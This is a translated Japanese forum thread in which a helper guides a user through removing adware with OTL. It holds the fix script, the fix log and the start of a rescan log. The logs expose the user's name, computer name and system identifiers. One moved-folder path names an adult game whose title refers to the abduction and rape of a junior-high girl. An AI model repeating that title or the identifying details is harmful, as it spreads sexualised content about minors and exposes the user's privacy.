c:\users\ryota\downloads\vlcmediaplayersetup-6zgtwof.exe
c:\users\ryota\downloads\vlcmediaplayersetup.exe
c:\users\ryota\desktop\xxxx\babel19sample
c:\users\ryota\desktop\xxxx\kontrapunkt_trial\kontrapunkt.exe
c:\users\ryota\desktop\実況\chorokuf\jword_plugin.exe
c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll
c:\programdata\application data\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}
c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll
c:\programdata\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa
c:\downloads
c:\program files (x86)\daemon tools lite
c:\program files (x86)\segmentamplifier
c:\users\ryota\downloads\utorrent.exe
c:\windows\system32\dmwu.exe

:Reg
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0BB8AC33-4C3D-426C-8439-A58A243DDC61}"=-
"{E0D4F4A4-50DB-4E61-A9A6-97D2145A436B}"=-
"{E6A917C9-2D7C-44DA-ADC3-F27BAC54466A}"=-
"{E6B916CF-2E4B-4E04-A2D0-24AF907AFED6}"=-

:Commands
[purity]
[resethosts]
[emptyflash]
[emptyjava]
[emptytemp]
[createrestorepoint]
[reboot]
------Copy and paste up to above this line------

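Once you have finished copying and pasting, save the file under a name that is easy to recognize.
After that, start the PC in Safe Mode.
Launch OTL again and paste the content you saved above into the Custom Scan/Fixes box.
Since this run is a removal job, there are no other options to check.
Click [Run Fix], shown in red, to start the fix.
Follow OTL's prompts as it proceeds. A fix log will be displayed either before or after the reboot into normal mode,
so please paste that log in your reply.
Please also report on the current state of the PC at that time.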
  • IVNO
  • MAIL
  • 2015/04/21 (Tue) 21:43:43
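Re: I am having trouble with pop-ups and ads being forcibly displayed.
For now, I have finished the steps above.
There has been no major change so far, and ads and pop-ups still appear.
I mentioned that things got worse during the gap between posts, but I had not told you that forced redirects to other pages also became more frequent during that time, so I am adding that here.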

Below:
OTL log

All processes killed
========== OTL ==========
HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\\CustomizeSearch| /E : value set successfully!
HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\\OCustomizeSearch| /E : value set successfully!
HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\\OSearchAssistant| /E : value set successfully!
HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\\SearchAssistant| /E : value set successfully!
HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main\\Secondary Start Pages| /E : value set successfully!
C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207 folder moved successfully.
C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171 folder moved successfully.
C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0 folder moved successfully.
Registry value HKEY_USERS\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Run\\DAEMON Tools Lite deleted successfully.
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe moved successfully.
C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe moved successfully.
C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JWord(日本語キーワード) folder moved successfully.
C:\Windows\Tasks\Price Meter Updater.job moved successfully.
========== FILES ==========
c:\programdata\cjhlcgankhfaeohlngbhkhbnhmhaokmc folder moved successfully.
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\fjaicoojlfoococemdcaollmhaiolole folder moved successfully.
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\foiapgoppijipmmgkaibacckkhbngfhp folder moved successfully.
c:\users\ryota\appdata\local\google\chrome\user data\default\extensions\geoafhlnmffijlblgohnpmjfbnpcpadd folder moved successfully.
c:\users\ryota\downloads\TW628J.exe moved successfully.
c:\users\ryota\downloads\CR_Downloader_for_super-smash-bros..exe moved successfully.
c:\users\ryota\downloads\DTLite4491-0356.exe moved successfully.
c:\users\ryota\downloads\daemon347_inst.exe moved successfully.
c:\users\ryota\downloads\FileOpenerSetup.exe moved successfully.
c:\users\ryota\downloads\FreemakeAudioConverterSetup.exe moved successfully.
c:\users\ryota\downloads\DownloadManagerSetup.exe moved successfully.
c:\users\ryota\downloads\ADLSoft_UnCompressor_v2_3.exe moved successfully.
c:\users\ryota\downloads\ccsetup404.exe moved successfully.
c:\users\ryota\downloads\CodecPackage.exe moved successfully.
c:\users\ryota\downloads\Downloader_for_Shaman%20King%20Card%20Game%20-%20Chou%20Senjiryakketsu%202%20%28Japan%29(1).exe moved successfully.
c:\users\ryota\downloads\Downloader_for_Shaman%20King%20Card%20Game%20-%20Chou%20Senjiryakketsu%202%20%28Japan%29.exe moved successfully.
c:\users\ryota\downloads\DTLite4454-0314.exe moved successfully.
c:\users\ryota\downloads\File_Opener.exe moved successfully.
c:\users\ryota\downloads\installer_manycam_3_0_92_Japanese.exe moved successfully.
c:\users\ryota\downloads\rcpsetupdsnr_ds367212.exe moved successfully.
c:\users\ryota\downloads\Setup.exe moved successfully.
c:\users\ryota\downloads\VLCMediaPlayerSetup-6ZgtwOf.exe moved successfully.
c:\users\ryota\downloads\VLCMediaPlayerSetup.exe moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\JC拉致監禁レイプ_体験版\savedata folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\JC拉致監禁レイプ_体験版 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\脳内 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\savedata folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\tmp folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00010000\5358344a\data folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00010000\5358344a\content folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00010000\5358344a folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00010000 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00000001\00000002\data folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00000001\00000002 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title\00000001 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\title folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\sys folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\wc24\mbox folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\wc24 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\sys folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\succession folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2\ec folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii\shared2 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Wii folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\StateSaves folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Shaders folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\ShaderCache folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\ScreenShots folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\OpenCL folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Maps folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Logs\Mail folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Logs folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Load\Textures folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Load folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\GC folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\GameConfig folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Dump\Textures folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Dump\DSP folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Dump folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Config folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Cache folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Sys\Wii folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Sys\GC folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Sys folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\zh_TW folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\zh_CN folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\sr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\ru folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\pt_BR folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\pt folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\pl folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\nl folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\nb folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\ko folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\ja folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\it folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\hu folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\he folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\fr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\es folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\en folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\el folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\de folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\cs folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\ar folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\save folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\graffiti folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\savedata folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\plugin folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\apt003_tr\oretsun_tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\apt003_tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample folder moved successfully.
c:\users\ryota\desktop\xxxx\kontrapunkt_trial\KONTRAPUNKT.exe moved successfully.
c:\users\ryota\desktop\実況\chorokuf\jword_plugin.exe moved successfully.
c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\Custom.dll moved successfully.
File\Folder c:\programdata\application data\{021e6b93-a7a5-9558-021e-e6b93a7aae4e} not found.
File\Folder c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll not found.
c:\programdata\{021e6b93-a7a5-9558-021e-e6b93a7aae4e} folder moved successfully.
c:\users\ryota\appdata\local\COMODO\dragon\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg\1.0 folder moved successfully.
c:\users\ryota\appdata\local\COMODO\dragon\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim\2.7 folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff\127 folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa\1.1 folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg\1.0 folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim\2.7 folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff\127 folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa\1.1 folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa folder moved successfully.
File\Folder c:\downloads not found.
c:\program files (x86)\DAEMON Tools Lite\Lang folder moved successfully.
c:\program files (x86)\DAEMON Tools Lite folder moved successfully.
c:\program files (x86)\SegmentAmplifier folder moved successfully.
File\Folder c:\users\ryota\downloads\utorrent.exe not found.
File\Folder c:\windows\system32\dmwu.exe not found.
========== REGISTRY ==========
Registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0BB8AC33-4C3D-426C-8439-A58A243DDC61} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0BB8AC33-4C3D-426C-8439-A58A243DDC61}\ not found.
Registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E0D4F4A4-50DB-4E61-A9A6-97D2145A436B} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E0D4F4A4-50DB-4E61-A9A6-97D2145A436B}\ not found.
Registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E6A917C9-2D7C-44DA-ADC3-F27BAC54466A} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E6A917C9-2D7C-44DA-ADC3-F27BAC54466A}\ not found.
Registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E6B916CF-2E4B-4E04-A2D0-24AF907AFED6} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E6B916CF-2E4B-4E04-A2D0-24AF907AFED6}\ not found.
========== COMMANDS ==========
C:\WINDOWS\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYFLASH]

User: Administrator

User: All Users

User: Default
->Flash cache emptied: 57616 bytes

User: Default User
->Flash cache emptied: 0 bytes

User: Default.migrated

User: Guest

User: Public

User: ryota
->Flash cache emptied: 297486 bytes

Total Flash Files Cleaned = 0.00 mb


[EMPTYJAVA]

User: Administrator

User: All Users

User: Default

User: Default User

User: Default.migrated

User: Guest

User: Public

User: ryota

Total Java Files Cleaned = 0.00 mb


[EMPTYTEMP]

User: Administrator

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default.migrated

User: Guest

User: Public

User: ryota
->Temp folder emptied: 61076371 bytes
->Temporary Internet Files folder emptied: 12986588 bytes
->FireFox cache emptied: 1149858 bytes
->Google Chrome cache emptied: 311812804 bytes
->Flash cache emptied: 0 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 3238240 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1518840 bytes
RecycleBin emptied: 6025858 bytes

Total Files Cleaned = 379.00 mb

Unable to start System Restore Service. Error code 1084

OTL by OldTimer - Version 3.2.69.0 log created on 04212015_221846

Files\Folders moved on Reboot...
C:\Users\ryota\AppData\Local\Microsoft\Windows\INetCache\counters.dat moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • かなは
  • 2015/04/21 (Tue) 22:27:28
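Please collect an OTL log once more
The OTL fix itself appears to have completed normally.
However, since you say the problems still persist, I am sorry for the trouble, but please run a scan with OTL once more.
Extras.txt may not be generated this time; if it is not, that is fine.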
  • IVNO
  • MAIL
  • 2015/04/22 (Wed) 17:18:49
Re: I am having trouble with pop-ups and ads being forcibly displayed.
Sorry to keep you waiting. I am pasting the OTL log below.
Extras.txt was not generated.


OTL logfile created on: 2015/04/22 23:55:38 - Run 3
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 7.11 Gb Available Physical Memory | 90.27% Memory free
9.13 Gb Paging File | 8.43 Gb Available in Paging File | 92.27% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.00 Gb Free Space | 7.66% Space Free | Partition Type: NTFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/02/21 08:49:18 | 000,780,800 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,366,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2014/10/31 13:51:25 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/10/29 12:59:51 | 003,460,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:[b]64bit:[/b] - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:19 | 000,026,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:03 | 000,041,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:[b]64bit:[/b] - [2014/10/29 11:34:51 | 000,067,584 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:[b]64bit:[/b] - [2014/10/29 11:33:55 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:29:22 | 000,121,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:57:05 | 000,324,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\BthHFSrv.dll -- (BthHFSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:48:20 | 000,166,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:21 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:21 | 000,838,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:02 | 000,294,912 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:37 | 000,131,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:20:03 | 000,262,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:17 | 000,154,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:24 | 000,374,784 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:02 | 000,260,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:36 | 000,407,040 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:22 | 000,270,336 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:[b]64bit:[/b] - [2014/10/29 10:11:10 | 001,639,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:09:48 | 000,521,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:05:09 | 000,206,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
